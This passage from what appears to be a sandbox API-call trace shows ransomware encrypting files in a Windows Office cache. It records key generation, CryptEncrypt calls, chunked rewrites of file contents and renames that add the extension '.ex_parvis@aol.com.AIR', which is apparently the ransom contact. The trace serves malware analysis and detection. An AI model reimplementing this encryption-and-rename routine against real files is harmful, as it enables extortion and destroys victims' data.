lpBuffer=0x34e0020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x34e0020*, lpNumberOfBytesWritten=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0157.321] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0xb9fa3ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.322] WriteFile (in: hFile=0x37c, lpBuffer=0x2acf9c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x2acf9c0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0157.322] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x8500000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.322] ReadFile (in: hFile=0x37c, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0157.334] SetFilePointer (in: hFile=0x37c, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8500000 [0157.334] WriteFile (in: hFile=0x37c, lpBuffer=0x34e0020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x34e0020*, lpNumberOfBytesWritten=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0157.337] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0xb9fa3ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.337] WriteFile (in: hFile=0x37c, lpBuffer=0x2acf9c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x2acf9c0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0157.337] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x9800000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.337] ReadFile (in: hFile=0x37c, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0157.345] SetFilePointer (in: hFile=0x37c, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9800000 [0157.345] WriteFile (in: hFile=0x37c, lpBuffer=0x34e0020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x34e0020*, lpNumberOfBytesWritten=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0157.352] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0xb9fa3ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.352] WriteFile (in: hFile=0x37c, lpBuffer=0x2acf9c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x2acf9c0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0157.352] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0xab00000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.352] ReadFile (in: hFile=0x37c, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0157.358] SetFilePointer (in: hFile=0x37c, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xab00000 [0157.359] WriteFile (in: hFile=0x37c, lpBuffer=0x34e0020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x34e0020*, lpNumberOfBytesWritten=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0157.361] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0xb9fa3ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.361] WriteFile (in: hFile=0x37c, lpBuffer=0x2acf9c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x2acf9c0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0157.361] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33d0020 | out: hHeap=0x2e0000) returned 1 [0157.366] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e0020 | out: hHeap=0x2e0000) returned 1 [0157.370] CloseHandle (hObject=0x37c) returned 1 [0157.535] GetProcessHeap () returned 0x2e0000 [0157.535] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0157.535] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0157.535] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0157.535] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385a10 | out: hHeap=0x2e0000) returned 1 [0157.535] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385968 | out: hHeap=0x2e0000) returned 1 [0157.535] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385968 [0157.535] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0157.535] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0157.535] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0157.535] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0157.536] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0157.536] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 73 [0157.536] GetProcessHeap () returned 0x2e0000 [0157.537] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf8) returned 0x31f5f0 [0157.537] lstrcpyW (in: lpString1=0x31f5f0, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" [0157.537] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" [0157.537] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0157.540] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x37c [0157.540] GetProcessHeap () returned 0x2e0000 [0157.540] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31f5f0 | out: hHeap=0x2e0000) returned 1 [0157.540] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=20577) returned 1 [0157.540] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x5061 [0157.540] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0157.540] GetProcessHeap () returned 0x2e0000 [0157.540] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0157.540] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0157.540] WriteFile (in: hFile=0x37c, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0157.542] WriteFile (in: hFile=0x37c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0157.542] WriteFile (in: hFile=0x37c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0157.542] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x5061) returned 0x3a7410 [0157.542] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x5061) returned 0x3ac480 [0157.542] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.542] ReadFile (in: hFile=0x37c, lpBuffer=0x3a7410, nNumberOfBytesToRead=0x5061, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3a7410*, lpNumberOfBytesRead=0x2acf9c8*=0x5061, lpOverlapped=0x0) returned 1 [0157.545] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0157.545] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0157.545] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe", dwFileAttributes=0x80) returned 1 [0157.546] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 73 [0157.546] GetProcessHeap () returned 0x2e0000 [0157.546] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf8) returned 0x31f5f0 [0157.546] lstrcpyW (in: lpString1=0x31f5f0, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" [0157.546] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe.12781717671972518758.ex_parvis@aol.com.AIR" [0157.546] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0157.549] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x37c [0157.549] GetProcessHeap () returned 0x2e0000 [0157.549] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31f5f0 | out: hHeap=0x2e0000) returned 1 [0157.549] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=1377656) returned 1 [0157.549] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x150578 [0157.549] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0157.549] GetProcessHeap () returned 0x2e0000 [0157.549] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0157.549] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0157.549] WriteFile (in: hFile=0x37c, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0157.551] WriteFile (in: hFile=0x37c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0157.551] WriteFile (in: hFile=0x37c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0157.551] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x150578) returned 0x33d0020 [0157.551] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x150578) returned 0x3530020 [0157.552] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.552] ReadFile (in: hFile=0x37c, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x150578, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x150578, lpOverlapped=0x0) returned 1 [0157.614] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0157.614] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0157.614] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms", dwFileAttributes=0x80) returned 1 [0157.615] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 88 [0157.615] GetProcessHeap () returned 0x2e0000 [0157.615] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x116) returned 0x336dd8 [0157.615] lstrcpyW (in: lpString1=0x336dd8, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" [0157.615] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.12781717671972518758.ex_parvis@aol.com.AIR" [0157.615] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0157.618] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x37c [0157.618] GetProcessHeap () returned 0x2e0000 [0157.618] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336dd8 | out: hHeap=0x2e0000) returned 1 [0157.618] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=715834) returned 1 [0157.618] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xaec3a [0157.618] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0157.618] GetProcessHeap () returned 0x2e0000 [0157.618] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0157.618] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0157.618] WriteFile (in: hFile=0x37c, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0157.620] WriteFile (in: hFile=0x37c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0157.620] WriteFile (in: hFile=0x37c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0157.620] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xaec3a) returned 0x33d0020 [0157.620] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xaec3a) returned 0x3480020 [0157.621] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.621] ReadFile (in: hFile=0x37c, lpBuffer=0x33d0020, nNumberOfBytesToRead=0xaec3a, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0xaec3a, lpOverlapped=0x0) returned 1 [0157.647] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0157.647] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0157.647] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll", dwFileAttributes=0x80) returned 1 [0157.648] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 75 [0157.648] GetProcessHeap () returned 0x2e0000 [0157.648] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfc) returned 0x363a50 [0157.648] lstrcpyW (in: lpString1=0x363a50, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" [0157.648] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll.12781717671972518758.ex_parvis@aol.com.AIR" [0157.648] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0157.651] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x37c [0157.651] GetProcessHeap () returned 0x2e0000 [0157.651] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0157.651] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=1463568) returned 1 [0157.651] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x165510 [0157.652] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0157.652] GetProcessHeap () returned 0x2e0000 [0157.652] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0157.652] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0157.652] WriteFile (in: hFile=0x37c, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0157.653] WriteFile (in: hFile=0x37c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0157.653] WriteFile (in: hFile=0x37c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0157.653] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x165510) returned 0x33d0020 [0157.654] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x165510) returned 0x3540020 [0157.654] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.654] ReadFile (in: hFile=0x37c, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x165510, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x165510, lpOverlapped=0x0) returned 1 [0157.718] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0157.718] CryptGenRandom 